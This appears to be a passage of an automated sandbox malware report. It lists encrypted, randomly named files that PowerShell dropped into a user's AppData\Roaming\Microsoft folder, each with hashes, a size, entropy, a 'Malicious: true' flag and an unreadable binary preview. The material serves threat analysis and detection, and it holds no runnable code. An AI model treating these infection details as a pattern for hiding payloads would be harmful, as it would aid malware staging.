MD5:	9C815508E485300D8A49220E1EDEF8CF
SHA1:	EBF7961E027A6C20150B1F2FAC3D475FFF32335F
SHA-256:	F437EE0333AB65FBAE9A75590FF462587CF12901F1BCC5CA8C9AA93BFFB5F40A
SHA-512:	0DE4BAEA40F99698465362993F669314D38DC391390163C0FF3BD4B515885FD0D1FEC256DE8621F162C45FC6D83B8ABE53E8B77D2E5545B83D6EF7CC4AF8852D
Malicious:	true
Reputation:	unknown
Preview:	...Z...6b..'.!.j..r...'......+...Au..'.......ntg. 8....3.,....9;.........+..pX..8.e\.:......F.....^..z.... ..)...n......,......h...9e8..O.^f\|.d...H....+b.a..Y..i..36-#.0F).6...&m~yA,.j..-........zq..Kb......}.Y.&.<(oW(.c._........c...?...}.p.>2....{#I.g....j..I^vx.s.U...1.p....4\|..HFK.K;...y..=CK...9..x...........1m..oZa.EF..-.I.a..x...E......4...5bs.b2..s..R.].3...g..H.w.d.[..s.+IF..;...&.<2....w;6a.+F%..q..2 Dh...mX....=TE..UZ.]8...Y..C=R...o.m..A.b.......=A..k.X.8..%n.[f9VJpL..>.Tg.,g...(...2...a4.a........\|.ON...6\|z.u.?F.Ic..aY....?.X...JiX..l@k...c.q...9$..!#.z...p#.".......h...T,k.q.....(Ft.H.).Cv.A.....-.Lsd.BMN.f..U%'}.y.?C..jH..w....lS......d.-.q...Nwf.s.Pw.....!.q......"D....5..Q.*B.h.....$..XH....~.....XD.6.]../..W...D{ (.Nh.\|......].8R..p8XO..6..Fh.:8..+..E=C.....<^g.f[...K.N.\D.c.qV.y.b;.,P.d.y_.P.{.-&...\|..)/..I...h+......ix...Y.).f.....-&.N$/C!..5O-O......g.Ki....[..k.ot..%W4...e..^....b!.,.+....Q..G...a)&.....E........

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\guHsdjwxzUfcvOkC.pobQxMgAswRz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	94822
Entropy (8bit):	7.99826135774676
Encrypted:	true
SSDEEP:	1536:zYc4Cu3G8NAUOvLub79+AgtHfv0HlsUSh2mXkJ25zqclSDCV5IA73oh9RymKxnCN:zY/JiA7dgRU+lhXXkJ25z48rqd+nCN
MD5:	E6EFFB3520C8CDB391BFC603727BC9F7
SHA1:	AFCF6C83C14D39134003C7667295B46AC71E9D62
SHA-256:	FEB2852B0C9CE97ED2D19865E3D9F1BB00137E8A0467DC8A0B8FD49027509D91
SHA-512:	3B8D50C32697679C7F55CB5B81A6CA739BC427DEFADC9324399927FB1193079D5E3D65B7943A976D37A3ACF95B0F7471619B0563C903B452AFC3B2963395ED72
Malicious:	true
Reputation:	unknown
Preview:	.x.7rh"Qkg^.Y....u...I...+.......bb(...e_...Q\......._..pGP.#..'S.V...\|3.p._v...J..../....;.<....A.E.\.`$.-.y5r...#.{.Y.AVu_FOK..........&m.4.kcc.#..B9.T...n..[..&....U...;...Q,K.O4.L..[.....=.Qr..].........c..W...............W...h...$.s.......c.Fv................\..-.&3m..ZD.b...n.R&_.........TP.......e...{.A'..h..o6(Z.+..\|.}y...t..Y....V..9...P....c\...t..........W.t.VPC..\|....Dx.#....)./{._.].m.......2#.x..y.I.^....J.&%..P...Bab.}.^P..jR.'.iELo.X............'B.G e.!......x.lf.Q./.......g.A..'......L....6_.)S.......]bL&..`..P.....RKFg..3...;.....Inw..S@......#..7.........\@.R1..z..&5.k%..`..u.=.h.Wm......:...#.....m..!...S...Kw.#U!.Q,.W.....Q.^.d0..q...Zm..P6.R....ZU...A}.-7.=-.F.z.pfQ.<.6..p.Q..Hb.l..Wn..,6%.#OP^..M'....\|...O...........A..g.nZ.B..Q!Z...y...P...Yvv`.%L_.....=.....oM....5.U.G.........b=.....@.k..(.H.g!*D..`..XC+E:....._.......[+.'..B.O$c...Aa..d.....n.^..ur..W...r..y.{/.gWO.G.....39+<.S..HX..E..m.3...p..A

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hAcGMTpVXNgSKd.hJxUGdyFSZq Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	53854
Entropy (8bit):	7.996909110733189
Encrypted:	true
SSDEEP:	1536:PUUS2ILRRK4i6X6hwIUNJ4joaPLkwrVO1ItVOni:8UeRW24XzkwrVO1ITOni
MD5:	DC2276885921CF4C3B95139EB6A3690C
SHA1:	F0FDA708B86049F5782CD2959B8014426FD81B1D
SHA-256:	8D02BA002FBC00EC8DA6B5A53248F5579D7E39A56292342B124B863265A78FED
SHA-512:	4EF06B78312492FCD0FDC75A8F3EF834A79DAF15A53E2A861369E4DDFF44C791AF912049F2977EE87C3E4DB4946EAAF85C20DFF99696B2872749CBC89A404421
Malicious:	true
Reputation:	unknown
Preview:	...%Y...,..$UI1.o>..:8>U......8...7..H\Yz.k......5R..jk.U.U...^#a7..y.zw...j.....<...;v. U.}..m......W.......=.Q..UZt%.-.#..s8>J.G..Q...H.C.5.....v.32.d$..3..g..L$....".o...9..Mb...../)...B.l.......S.. x..D.UZ...4zS..5=J,.4_c..G..n%S....=...0......{.C..C"..x...........2>Vm.XL...X..s.~.(..i3.......x.XC.G.'+E$.8.%.)YV;t"^.:...&....c..<....E5.....G.G...V.ar.ob...X#.S...w<..)}.......iU....{.Kc..:b..5..8..@.?..~AX..B..I.....v..M04.k..&L.;.+.<.......r_.M....1.$X.......>...V...=.8H../.E..7..o.H.^.9.oO.o..u.\|....a.p.G..^.V-X......k.=.K.hq.-.,...*..ha~..d...:d...p.S..5fmg...TN....;..C:3....I.".....3..s$c}Mv....<.-..os....,..2..=...8...-.)...\|.n...s[........N........c.......(.7.&f..c().[.A........o=...d.....<.9k(.....yK......@.J.(=.F.-'.(.[.......v6v........'....wJ....UQ..JW./tQA..-I,.i=..ii(.uU...Y..%.8.9l.]p....gJ...6...QZ...z. e....e.B..#L...u....8.#.4]v.a...]OL......#9q_......nV.N..D.3.-r...j ^.H&......KO..0.g../.......q.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hIPsocBjaUyOqWti.JHutNArwyzmxWfQK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	132231
Entropy (8bit):	7.998463097154918
Encrypted:	true
SSDEEP:	3072:HfhhNG4C9VvFDxwZVplOnxXvM/p1FdbSEkz4L4l7MxTTYw:/hhNG191FDeZVplOx4p1FuZlAVj
MD5:	EAD5938C337A8CADAFF2A0BE6B004FBB
SHA1:	59EEE7810C35478BAF08A58B4352B3BC07B33D19
SHA-256:	725BB1FB45F9821830DAF6E7700CFC1501FD5B9628FA2AA5D4041F3E48DB1D71
SHA-512:	1BB42A6D0397CF74974D3AD11B0D42FED5C0EB13C21866FEB585C049283C88DA30B0D9ECD595EBB7549BCAB326E7033E2D85058A7B363645CC22AF2E9DCDF564
Malicious:	true
Reputation:	unknown
Preview:	j> ...G...SK.uh8>..#...v....d..1.........v:]y.0.^...5y...Q.2\|.^..w_...7d.l...o..x,~.`HI..~..D.C....f.HB...{.H.".0...Mq..edC8.N..e...8M/...;..g....V:.B.OO....R].2.%.....;/..Ih..\::..+.y...K..rl.'..x..1.S.......XDp.h%.......8.F.!.!..X..,-x....d...St..Q.?.L[:..I..I.)...X......$.y.....bRF...g..j..h..D...@..".6.L.W..q..`.R..re#3....l....X.$=}=..G.4[.....w.x..n.~...>.]..do...&.X.....\|.....u.qC...:[...E1.h.P7....o......Q....k.VZ#.o=.:.K.T..U.f..........4........D5.A.\-.......2pe.....R...0.Z..S..;P.....C....\|..~..A...B.,....d.....C..b(.qy.'E5JT.W.m.q..$.s4.....}.."W;...=.`l......t.?.....A....U....a...........&....^_L...d..D.w.........u.i.c.f...{....e....'TU2e...I^.6]4..`m..:....0......{..\|.l..E....-...L.H?.P..u.0hNS.w.w..l%.?..N.F...`.I\|.<l7.o.....c(.....'-.....J.Un...8.\|..../4t.../....v"N..`5.%.N[..X.<v........F.C.^L.BK..F....)......^.(\U..........p......A..{..(B....G..s)..K`.!...^?~.\C...e..w.q..n..tL-/..c.,.....aP.$......B.#o.M..)....Si

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hMXRCujOwlAymN.PGuyfsOSomYN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	114963
Entropy (8bit):	7.998406725005653
Encrypted:	true
SSDEEP:	3072:zv+Zh/FUbE9g45HwjovC4PGsfPzYB3jnl6T:zv+Zht5d5wsq0Gsfs3jnsT
MD5:	F3D52BAF2D3BAA77B28FEC6F40827421
SHA1:	2563366804BBFDD54B232F5E5521CC06532A0DC2
SHA-256:	BEF38B088A3BB9A42E5B302C1CA46C684884A53C4FF0BAD16BCE7071D5A0EB9E
SHA-512:	5842E0063D5AF1CF2E2572E71D3884DAF5C9762F166855B7DC4B321C2CC4030390301D08B72EFD1677C331E708956F03ECD569A31C11BD07F88E5FF4277AFBDB
Malicious:	true
Reputation:	unknown
Preview:	.5N..E..g0.....2q......./..'".......TU...Hwmq.......+g.=F.!.@....=..O.I...Ek5O.C...tA..IA..@...{.m.4..K.P.;J!...X.............J.....@8$,.?'........&.10..Gi1.W.@e.Y.t..re...!.Wg>. i.S._..?.\....n...h..z..%.... ...@.W...3.'.C...i3....Q.}.....<.P.f.}.3R.5S...(..X...}...V.F..%t...J`.}..S.(.....1..<w._E.OU-n.e..?..(J........\|B.7..I.......4...C..q...-..;k.\|.+A....z...., .-......:^m.Mb.{`8..........{...eEz.%.......K.L.A,o..Z..8.........%a;......E.....O[.:c...y].f2M2h./........<.....o9...2L.N+...i[.+.;.]..+},.[G`}:.....P.g...K.1U.){.E.....}..lm..!H..Gwk.....K.C2.s7...k.@I.....)C..V......W....(::W.[..c+...0...]3(.a..Z.Mc...nb\|@...zM....:.-...;.}.[.&.......X.wmr3............... T7.}.............z.....p...s.[M...c^..%J,.+.-?p..f.JA6..\|...a..J...t(.......b......Jk..I.A.#.X..t..g.}x'.#.1......`.....&..~<>...l.l$.j".....y.<M...r.....W..[..E9.S.i.Wd.,R...D.1jF.SR..Q...5...k-r.%..j.0.J..nL)\|.H.j..Z......)A.\ND.r...TY.I..P........i....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hSxXzsETYI.UdWqkVrQYwiAeIOH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	75146
Entropy (8bit):	7.997235262923504
Encrypted:	true
SSDEEP:	1536:PVOQEMjDVndkwSwMr7FxAdAT6J3OKOFMwxvO4b1I4x8Vv4HGbzirfj:PVOQEMjDVniwsZxAde6rOFTvq4x8dJb8
MD5:	694D3B81B0A22E5CC892741D6BBE1966
SHA1:	5CF80E7E7843D36199E1293C592AB63F635871AB
SHA-256:	B2F408F5DC7CD6BA3183EFD47E623D3C26F3149D3D017D62999386DA02BE18D8
SHA-512:	2C065A15023D4FEC0034C634ADA09E6D4DEB69AEE3686A060A0622B9D3C6B8EE2FB47BB6F7F877443B88891A3249090F6B9B66311D0DADC6635D5F85D32F5914
Malicious:	true
Reputation:	unknown
Preview:	.c........yx..EY..k_c...@..?.)vT.c@Yj.......=mz..}.?...QH.sP4.z.V%.#...s.e......c..=7.....h7...V74.{Vr.wgceB..#..]Ju...U...<%..;\[.V.d.v..(7K2YD..t...~&....;B..._\]K..~..Oq.Iw.A._ .Z.FG/L..o..YSD...J.{8.....wQg.........\..C......Z\y..x..:&.K{....9....T..R...>q..k7h..4..... .N.k.my..-%..%M~D.c..>.B..ccS.9..\|mE..3F..C...z...Xr........I..wy....8_jRZ....U.?`+?.........S....Vr.....6L....,./.N..R{.hdLT..H...w..VF..y.A..G..#Lg/.d...k...E>.....L.r.I.xz9.W.Yb.Q..r.W.....4...X.=.x.^......wb.a.E.]...Wr.D.a....jw.......9s\....x..pR.r..F...E..u..j..e....q5}...<..$z......L...6."u.6c...sO5...)....P.".b.._.......ku..H..y.c...r%.......}[....Y..).........[.U.iX^.s..ql.X..D.xu 3.R.#.....E.',BX....v.7.}y.....;\.~.u....av.;a..x.}9K]........ja....+..o(.vU.PB.......%..q........{......I.Z...B..K...(0qT.?$.]...\.......=..L2.Jt.\|.;.#s\|.$UD...5.Q.fC..BF...E..F..N. K.........H...c....p.6..[.......EY..../.B..^..'\|4Y.UZ..B+=...A.Q.i...{...=Xf.i......a.=.eo.J.....u....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hUsfqNadGZ.hKnxVlyqQWMLPieGF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64455
Entropy (8bit):	7.997356884068506
Encrypted:	true
SSDEEP:	768:7ozXGpLcKdOsD57fyTWiP3mJkZ6NL3iNGF6Bhzamxuq2GiRzK1tpWWW7MP:7WXGCjs0FmJk03iNGMh+m4PPK1tdP
MD5:	69DE3CC305D57010E2600F6028B2C03F
SHA1:	BD0259AF1EFBF2817037D79FBC6DED7B8079A777
SHA-256:	3FAB09F45C516C31F44F5A6ECD18F7B6979F5ED74344C6D166B95415FBB24CA0
SHA-512:	133A008FF9A255EA9ED0C40904A7D431060E03E3F818699175A40D8223B23E5C422E8F2E9F488F954B90BA044E0234A623523918FD1AB366147890B471F65CDC
Malicious:	true
Reputation:	unknown
Preview:	`.F.h.S..T...a..E...j...\|`.J.....v5.z..W-9.~......._5,.ybLH.....X+JOX?J.1D...ZaT,z.Zr@....\|.......~..+.N....~...?gp.~."FO..:9.YC....N:..< ....(Y=z.nt.[e3\..Rw.<.#C..."........7..O.^.1..Bw.k...G..G$..X8..Y.fN..r(....+}TF0@...qz.r....&.U\-....."..j....m9(.U..)...TY.Z..O.5.m..y.....E..]-N\|.Ev\|.,..B....LW......+V........ ..>..A..7.\4..........]..Y...)..3MzL.J...y..XI.2..{.........2..U.\|E.X...v.4[.6~L.C.P.2.R.ck.;....>/.......?..gik..}.o..%...\..K...N_..%T..[......m.c.F.M....[..'y.n..Y:a)...d.h....}...).e..M...3./.y.._..K...0.N.-....E.....0..SP...q....;;.........O`.~A.k.rF..;.D...>V...1...V...33...., Q..QS......E.E..i-...x/.......6..O..1..d.....e+.... ..ZKg0'P#.c.n../7..-.,...4..#....@1../.=z.B.`BoA.Xg..B.~o1...m....z...Pg..c..C...]D..g................7...+y.7+)4..,.......<V.RQ....P.......<.........bl6Td..A..,W.pSvf.+._%@.s>.XL.PN.Wu.bJ....uu1.-D.9...........@_.....G..U.....h.v....3Jc..5.W.n..(..e:5[8.#\bG0....-..[..{,RwB..A.2XH....k....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hcCwgPHLSEfDk.RDVQyiwPlmbMvILXh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	194625
Entropy (8bit):	7.99896379872551
Encrypted:	true
SSDEEP:	3072:q3MiDoVnxcoByjSnnMOvhtXeDIjZnKUl2K22NPS4pOaQujPbG6xIdtVdLjjT2Vsb:q3MiDSxcN4M+e8t72o64rbpI7XuVsKta
MD5:	4434476117F369AA7BFE74C39C304EBE
SHA1:	ECDEE9C17F50AEB6DF40A859A26C1C0C5A51E06E
SHA-256:	E960C658E9CD3AC9D15704FA63E562EC878218A55A0582071D74FD166EF82B72
SHA-512:	EA9B61DE96B90D15A0D33A122ED8DBC448EE81D24B6D95D359E43EEECC480822B0EEF80374FDD4B3A7951D62E1AFAEA000DEE5EA27A8F8F0CCBF2D9546026667
Malicious:	true
Reputation:	unknown
Preview:	..U......un....a...t.,}.......N.....y.s...^.<....Yvr(Rs...........V.......]d...f..p.b......O1?..../.\.u....eC..~$...UP].=..s..V.P...6.M.c...oS+..+..U...p.P@.L[s..)..Gc..[..=.j...@...-a...Ya;C_.Z)KkB.J~.`..2...H.3l.=...O...l+.s.........'].5c.N.{,.?..xy.....k.....=`...Y..l5.....3....T\|G......Y..k..#9.Z.^..V,...8g0..........P.h.4p...hxu..o....+.....-..F.....&k.5..)..HW.Qata.&.. ..N..5."e.7.u.<....g..(.C...^GM.Z..... .QW....7._@.W+...o..v>d..6....CG..ao_.sZ......tU....../,A.~.J=O..R.Q....".r;...c..%\.{..?2...DW.e.!....g.zS.T...c..s..0..H.@.j...Q..p.O...}GK.i..u..rr.vX.A..M......6@^...d....1..hu.bMN...2.c..,.f...Y.u.kHo.....4I..y...s...3pc.Mx..R...?...,x.../s.qj....F..k7..%.7I..-5.:.).G.....(...>...C.......%MFT.0..Z...3.3..p4.1Xn.e'..A........})V(.P.w/...j.......xo....0\|#.w+..f./.:L...7..[...m./..=a.N..."..../A.5.~....F.:.Y..CY......c..`.}.X.g.j(\|.[........i.,...M..R..;Z{*u.M.{.14.A(dE..0...BPC....N..0.K.\|9.db..W..b..f.vI.c9.1.0..[]`!.].{..?.g.X

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hlHBxDUXTqb.hLQXuPwUSeIyROVc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	196511
Entropy (8bit):	7.999056931407319
Encrypted:	true
SSDEEP:	3072:maAP2mdjE0wu3mHgYMQaJeNZiZjMquxBFwUMkFF2DIkuAyOhDK6JZutlHLIcY+5/:vAPGhumAYIJljMLgUhHA/N3ZutlrIcYG
MD5:	9E6ECF6401F5DC04BBAF64CAA157074C
SHA1:	F36E12E29287B73FB0CE06E6B73C3CC543609414
SHA-256:	49A77D51CDD5608C1881F628C2D162D082AC938A3BC448908CB80F6D679364BA
SHA-512:	8BDE5BE0D98B071EC11C3F90B1F94E9353BAAB0A58402AF57936FC9B39B8D313B0B778B65E5BE9D090CF69C105E8018C49718051D414AF6637520BC737AF172D
Malicious:	true
Reputation:	unknown
Preview:	..q..$.......92.S...%..m..KV..{j..D$...&.3PP.H.I...x....`...o..)!...Ak.:.(cv.....-..2KzJ....f6&...;.Q.>.3DGz8\|.,6iY....rK..?.#....j...F..f......:b...Y....N#.N.7.....M....+.75..i.)....?..R.n.@tg.Gm...Y..j.a.H:Do.T...T+..8.....3.A....]{....o4s...]..St?^...C.o-..{..TG6....f.]....Y..T.qU/.""..;.(A..^?..#....p..Wv..& @..F.\v...!.......ydxs^.N446N.0......hwd.V.U.j.{k...I.(AXR;..........!........cA$J93D..N"<....#.&.QK......^6....XI.}.9U.....e...;...].C9,.......VY....Z.....\|R.C.....C.Xe...<.@.D.o......T..Gs..A.U.........K.9A.7...7..8$=..m}W=...].Y.<mF....iH<...5...:.._..1.u..4..(r.L.@..?...l....."3i.....+7..a..B.M........a.n..A....~.X.k.-.S..`_.\\y8.0..{...z...)...>...^......p.>...S.a...S.[......\|M...ai.lw".W4Zm....K.!..ZE..\....L.&..+..=?8.].F.....0`.)1S..%..*O..G}..!V..H......!...<.a..O.-.....gT......?Vv...l#b..`J.2...09r...79.G.;..!W.=.D....J.8...R-o..6.2[M3........I....NT.2.....sx.,uT ..fZ.......?..@.S.Wx.U..O.6.......9.]..Q+

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hsafHjXxuEDUqoniWy.bvRkoZsXrnhT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	170664
Entropy (8bit):	7.998816010205112
Encrypted:	true
SSDEEP:	3072:6snO6lP/vMy1zN/Vei2mh5MncynV5S01lVCwKyuZoeGBncLho+nwyYQJXrAqR7Cq:6sOG/EAzN/L2m5snVXrKyuGWLho+nwyn
MD5:	BA5811DFE8B1898EF27F39B3378354CA
SHA1:	B482C62F19BDE8E35393A45EC8B6BD7B296F529D
SHA-256:	BF9DFF313C760F23688C8C5B8E517482EA7AC7401AFB7D0324FE56E67005CFBB
SHA-512:	6D1FD317F7E7844A17D0F8414B58568E7892F5239BD181C9D88F084B5522CF0CA8AB92153757B55183A816FF7716A522E27E759187E1461B20D676057FBE063C
Malicious:	true
Reputation:	unknown
Preview:	.~i.....@1..............+.&.u]..J=...X"..98._A..&.D.>..,.....[....\..>.H...J..6....jX.AC.Ae....6.......)..\[/.V$...;.]p.U.G..+..k.7.X>@;v..WR....S... .Q...]/\|.3e.#d...dw._.....5..{;.3.n.f....8.!.ld...>.nN.e+h'W.....^.1...........?.....V:.`a.)...\|...3.O..)h.KVFA..-[+.a.].m{...,..f..G...4.......Y..uQ`H....Zn.{c......~..Pq..Q..R.G.<.Oj..6c.\lR...$.;,..I...y"..=....'K[ .....G...bG........N{.t.u.U..1c.._x).}......<.9.3..4d.......2f......^..=\1..tZve}.K.Y..Z.-...i:....P.Ae....:.fJm...;..M.D.z.k.GB...H.....8Q.....e.5........C......x..U..l($......p..;.8...(..M...!..'.Y.X........E..j\|RpxA,.....+..+&....,. ...'......"..\|m.9cP...Yb...?.P.P..ITX.9.y..; .9..T.6g."3'...........`....^\}a..]E.MUB.' 0/....2}%..+.Io......_..b.Qp...g..0!...+.X.t.O..R.\|.cI...7V....#..Io>......Q.7...@.....zR`Fp..J...,...y...Q5..cCa........{K%M%y%... n..r.8).A..N...:z.l6o..[T.}+....6@1J........n...B?..;.y...k..`H.P.Px....oW..W...}M._........SM..C*...VEA"...^..........]...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\huMidgcwOmveyRlEjAo.DRhwnzugrvie Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	76490
Entropy (8bit):	7.997741311718744
Encrypted:	true
SSDEEP:	1536:he2/jrVcMwVNN0/1U8rOW2Qj8PXJN/15A96Z2bu+7C/gN:o2/j5ke/1xqWP8PZTch77C/2
MD5:	B00550E516BDABCD7D34DB7DBC60A91B
SHA1:	2DF5AE5563DFA51681206F06E87B1CB7BD8BC55D
SHA-256:	C1D7C6724542841EFB1D9FAD51B32F0A1DE43AB989CAC0567D1E9FA9EE524439
SHA-512:	848DBBF45D90BA1FB80F98E6A31C80A6EEA27CDB141D369C2128607365989F9A37A1D4AAFCADEB9EA0EABEDDE685CFF1AA89592CF406202AD83FEAB9A960C283
Malicious:	true
Reputation:	unknown
Preview:	a7>]_....t^ETb_.l...PZ\.Q.q$..x.`.&..\|a.ox.........L ...A..a..w...<l..Bv..[.._..&6..N?.H..n.#..F.NP...\|..8.J0..\|]..Av.#.[1..R'B...Q...(.=x1W........h+\6.....\|e]...Z..s.,......X6F..z8^L.P.Ka.J!b..gC...`0.1.W.L.v5kt..j6N..'j.J._......(.....M.......K.[1......V._..x..qB........).n6.qe.x...`$#.fq.R3.. .sk.i.....P. ..A...\|.]\.F..i...N.^..s....;F...%./.&..o.hl.%.._.x.6?..^.....W..\.l..).b>%8]...!.i.O...30.h\.Q..g. ..~...Za.^y.F.....l....B...U...1.u(.{..1.m.!o.c....@.&;7...{7..s.w..NT\|.g....r..<.."Wc..........s.._>.}3../f .....7#QV..T....l.8.d{.#..0...H_.%:...x...0.p....=I-..0...l.b.\..n...Qm..DG.P...].Kz..C..9..k.^..2...L01.;m.W...p...=.t....nk.:..........M.l.].&....W.......d.3......"8&C.p3!H..K.[na...T%WE.yz......j.4k...m.cy....H./.3.0...q.Dm\(.0...'..>.~..........v.:?iy$...,:.X...!.e[.xd..6q8...`.$....=.~..dT...c..k.G}B..(L....`.c......p........O..@E.t.2..S..*.5..o.p..p..H0....c"F.;..o.Q....X..H...]ZR.p.....u.....X.JdD.@J.....qnN..F...R

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\iEzqkoWjrKlyTD.bfnLoGcapNwSrqgU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	117043
Entropy (8bit):	7.998382661390901
Encrypted:	true
SSDEEP:	3072:3jmcf93mqwbKfUAzzF5AOm1IdRqy6W/K8S:F3mmvF5ADkf6cKP
MD5:	815D0A32B742B6508970429CBED16DC2
SHA1:	ED37C5F2168C7673655BF3BB0084701D66C5A72E
SHA-256:	6211F842318A811A20BBBDC3558C92CAE5A6D4591B111194451F88A0EFCC8351
SHA-512:	A220E523CDE0704B80B92E89C11BCD45B58EA70119CF882D58CA232F331D7A278D2AF775B45F3332A6AD5EBE500B07265F3872B79896F9E224595AB53040C7CB
Malicious:	true
Reputation:	unknown
Preview:	b^,x.X\|j..{.]...t.A....yT..R...a.}E_........D.x..CypO..`g.#.o....X..F......o5.R?...5..y.....F.s>.W.......H`.}~./..D...f..E.E8G...N.k...eN.0...9/.Mn..".1.....~....r0...r.k.{5l.......:....I./....-R..TFiM.wl.].O.(...y=H.."......W.k.s.~6....>.....$.\..6cJ$.a..B.@r+Jd..v.....pg..{.->..4y(....z.\|q...Hw........n.t.......<...U...N.Y%C._.X..,...e......c..k<gEp.S.0..H...^......,;.d0.T).NXh"N.k..%xf#..../......L:..r#!...X7s..U........XDQ..[Av..........Y#..x........0.....Xvn.....!;.~......2.V{%x.......3Cc.j.,.".....?.........i....d.:L.yX..!=.EZ..b.....C..KVQ..).{q..^O;".j.4M.B..............g....;.....Ma.;..R.)h.Z...!9.....&.L..b...4......m.9..~.)\|w..K....^\|D..d.JM..x.K...Y....N......'.Yoe#..C.g.M+o....q}...@....c..PR.Ta/...S.fn..`s.3b.._.y$B...Zc.`.n.M..P.).G.Ix..0.......}.f......X..r..5.b......).....pf{s.]5D.u..+L..>..G....."hA..d.*0..<.....K.j]....K.(pj..;..W..#C"R/O...(..8.e....G.....,......1.';Sd\Ve..r..Tu.V`..}.h..".I..^..1=.nH.....F.Ys-&..?x^

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ieURGnTmlZWKpkYrcu.HgcoWfqXMIw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	167059
Entropy (8bit):	7.9989210311778995
Encrypted:	true
SSDEEP:	3072:POsQPV4Bd8EUuAVuYe9r1p/VBnrhs50oOStnjZNkFPB9sm5MzCDu5DIIhAiXFXoZ:WL0u+AVuYe9r1p/VVoZ0FPBN/DOIIhAp
MD5:	C1FA1183B3FFE7BD620F14D39D144836
SHA1:	8A6C7F61BAA5A3C64C82156F013AE4B68A359200
SHA-256:	CC49D1B5C44E6715AFE65CC2A88B69CDABFCDEAD542008088079A908F54605D9
SHA-512:	DE3DD01DF355B717E9009E6A4721D50CB2F69228FA85974D157DAFF10509C944D611E8BFB368E869DDE48D61CD33B7882AEC446CD828FFF9B99D43EFD9266F6C
Malicious:	true
Reputation:	unknown
Preview:	V..5q.D.8.&.Y6....,K'j...p...$#.v.....\|]Jx.rk...(b/..b... ....l.w........8.m&.....2.n..I....b>1..e.g\...~r...Z!.N.].....=T.X?..J..T...x.G.wH.P..c.........vS3...`...y...~.\|.1..+. 0q9...N`.....,p....;........o.............z..jW..0.......y.g..Iu..`...k..5.U'p_u5w.>.D.....,fiu~..........9..Z.G2$8....N.,Oa.....#\.ks..z....8.m..4E<s.W.....cp .,...b.dD..*.v~l.q.\..d..).h4Y..q..i.o..u....-yD......v\j'.8,V/.z....wr.....k...$...O..wU....h.tgyx.E.E... ..z.JV7..{..........cH.bo[.t...JV.......i..c.J......?....@.;..`...#Z....d..s.....F_..M.....-.Oe......&....5.....4J.k65..E...i...^c}9.pt..%3.8......[.x.u..9~\t....8:.1..".A.~....>.L7lG.....6.].P<..zr.k..9e7...H.....K?MO.Og.,T..A)[vzlaD`2.g....c?..\|.q,"...3..u......ED_.]..6B........JW.F.,%.=.._c.L.......:...~C....-D.....2.\B..r.}.Vv.....l....(1...z...5.x.V..t5RF@o........g..S.....MO.%.v..._{.....n.!e....E...hq... M}~.;..Z0....A...rX.....1..F...Y..vl...rY.n._...M/6.U.s..c&.......!...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\iqyWDrjapTfvERXgQ.HxUZrvwDOezbVJoN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	175841
Entropy (8bit):	7.9989662715756955
Encrypted:	true
SSDEEP:	3072:h5QiOcuGABbgFVNbEsfYWlc+r8eLBxakuZkT7c0+eMz9NeKDhgciqfKtoWZkmcLr:zQsuGSbgt/fYWlc+rXLvwkTQDlxeciq5
MD5:	DB47E46F2CF3A7C753591D3758E313F6
SHA1:	71BDDCD576B944D3FB4D3F0AAC38E9746FDC4446
SHA-256:	DBA5C395502ED2241927B74C988117E422BD8CA443E8C2EC4D0BF218739D0BA4
SHA-512:	F0FBF6C48C17BBC9648BF1CAD05C786ED30E4B4656635D618D2440FA91022E05B44CDCCB02FC82103232C78AB543224053A44C32B9B462213B33B71075BA72E6
Malicious:	true
Reputation:	unknown
